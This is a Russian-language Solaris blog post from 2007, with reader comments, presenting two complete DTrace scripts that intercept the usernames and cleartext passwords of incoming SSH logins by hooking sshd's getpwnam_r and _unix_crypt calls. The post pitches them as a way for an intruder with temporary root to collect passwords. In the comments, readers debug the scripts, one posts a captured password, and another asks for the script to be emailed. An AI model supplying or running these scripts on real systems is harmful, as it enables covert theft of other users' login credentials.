SunHelp.Ru : DTrace: входящие ssh тоже ловятся

Вернемся к разговору о недокументированных трюках с DTrace, касающихся ssh, о чем мы уже писали. Тогда мы привели пример скрипта, перехватывающего пароли исходящих ssh-коннектов. После этого возможно, кому-то показалась смешным возможность с помощью DTrace получить логины и пароли для ВХОДЯЩИХ ssh-соединений. Мол, с исходящими-то ладно, DTrace просто перехватывает локальный ввод, но со входящими такого не получится, там все закодировано и ssh-программисты не зря свой хлеб едят. А вот системный администратор Manuel Burki из Цюриха так не считает и в который раз заставляет убедиться в неограниченных возможностях DTrace.

Конечно, для всех примеров используются destructive actions, и простой пользователь не сможет ничего сделать. Предположим что некто, получивший на какое-то время (пока взлом не обнаружен и пароль root не сменен), взяв на вооружение DTrace, может за чашечкой кофе просматривать появляющиеся на консоли по мере подключения удаленных пользователей сообщения типа:

...
Username: jugin Password: jugin2341

Username: buch Password: buch1982

...

В этом случае счастливцу нет необходимости запускать к примеру JohnTheRipper - пароли сами лезут в руки.
Замечу, что приведенные ниже скрипты сразу не заработали (пришлось поэксперементировать c предикатами в первом скрипте), и потом тоже иногда пропускали коннекты, но факт налицо - я получил пароли с входящих ssh (естественно, коннектились я сам и мой коллега - конституцию мы уважаем и нарушать не собираемся

)
Cобственно, сам монитор:



#!/usr/sbin/dtrace -s

#

# monitor_sshd.d:  DTrace script to catch sshd forks and call catch_ssh_pw.d 

#

# Copyright (C) 2007 Manuel Burki - All rights reserved.

#

# See http://www.c0t0d1s0.org

#

# Redistribution and use in source and binary forms, with or without

# modification, are permitted provided that the following conditions are met:

#

# - Redistributions of source code must retain the above copyright notice, this

#   list of conditions and the following  disclaimer.

#

# - Redistributions in binary form must reproduce the above copyright notice, this

#   list of conditions and the following  disclaimer in the documentation and/or other

#   materials provided with the package.

#

# THIS SOFTWARE IS PROVIDED 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT

# NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND  FITNESS FOR A PARTICULAR

# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,

# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS

# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT

# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE

# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY  OF SUCH DAMAGE.



#pragma D option destructive

#pragma D option quiet



proc::cfork:create

/execname == "sshd"/

{

   self->rpid++;

}



proc::cfork:create

/execname == "sshd" && self->rpid==3/

{

   system("dtrace -s catch_ssh_pw.d -p %d", pid);

}

Вызываемый монитором скрипт, отлавливающий пароли:



#!/usr/sbin/dtrace -s

#

# catch_ssh_pw.d:  DTrace script to catch ssh login credentials 

#

# Copyright (C) 2007 Manuel Burki - All rights reserved.

#

# See http://www.c0t0d1s0.org

#

# Redistribution and use in source and binary forms, with or without

# modification, are permitted provided that the following conditions are met:

#

# - Redistributions of source code must retain the above copyright notice, this

#   list of conditions and the following  disclaimer.

#

# - Redistributions in binary form must reproduce the above copyright notice, this

#   list of conditions and the following  disclaimer in the documentation and/or other

#   materials provided with the package.

#

# THIS SOFTWARE IS PROVIDED 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT

# NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND  FITNESS FOR A PARTICULAR

# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,

# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS

# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT

# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE

# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY  OF SUCH DAMAGE.



#pragma D option destructive

#pragma D option quiet



pid$target::getpwnam_r:entry

{

    self->namecount++;

}



pid$target::getpwnam_r:entry

/self->namecount == 1/

{

    trace("Username: ");

    trace(copyinstr(arg0));

}



pid$target::_unix_crypt:entry

{

    trace(" Password: ");

    trace(copyinstr(arg0));

    exit(0);

}

Alexander Eremin в категории DTrace, Security в 13:16 | Комментарии (9) | Обратные ссылки (0)

Обратные ссылки

URI этой записи для создания обратных ссылок (trackback)

Нет обратных ссылок

Комментарии

Показывать комментарии (Как список | Древовидной структурой)

спасибо, полезный сайт.

#1 andrey on 2007-06-09 09:30 (Ответить)

Второй скрипт (catch_ssh_pw.d) выдает:

dtrace: failed to compile script ./catch_ssh_pw.d: line 6: pid0 does not contain a valid pid

Как лечить?

#2 Ruslan on 2007-06-12 23:46 (Ответить)

Это он аргументов не получает. В первом пропиши полный путь ко второму. Запускаешь первый, а он уже второй сам.

#2.1 SunHelp.Ru on 2007-06-13 14:53 (Ответить)

скрипт ничего не выдает, не работает?
solaris в vmware6
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
root@solaris # uname -a
SunOS solaris 5.10 Generic_118855-36 i86pc i386 i86pc

#3 suntehnik on 2007-06-16 13:23 (Ответить)

bash-3.00$ uname -a
SunOS admin.my.home 5.11 snv_61 i86pc i386 i86pc

Скрипт рабочий, вот мой вывод

dtrace: buffer size lowered to 512k
dtrace: buffer size lowered to 1m
Username: admin Password: FlVbY1LjVf2

#3.1 Admin on 2007-06-17 20:52 (Ответить)

Smojesh vislat svoy skript mne na milo

#3.1.1 Don on 2008-07-01 09:42 (Ответить)

Как это лечится
dtrace: failed to compile script ./monitor_sshd.d: line 5: invalid control directive: #monitor_sshd.d:

#4 Don on 2008-07-01 09:49 (Ответить)

Поставить текст комментария в / /.

#4.1 redtigra on 2009-09-15 14:04 (Ответить)

У меня скрипт работает ошибок нет, но перехватывает только логин и дальше висит, с чем это может быть связано?

SunOS server 5.10 Generic_141414-07 sun4u sparc SUNW,Sun-Fire-V490

#5 kirillko on 2010-01-14 15:16 (Ответить)

Добавить комментарий

Имя
Email
Домашняя страница
В ответ на
Комментарий	Enclosing asterisks marks text as bold (word), underscore are made via _word_. Standard emoticons like :-) and ;-) are converted to images. To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above:
	Запомнить информацию? Подписаться на эту запись
Добавленные комментарии должны будут пройти модерацию прежде, чем будут показаны.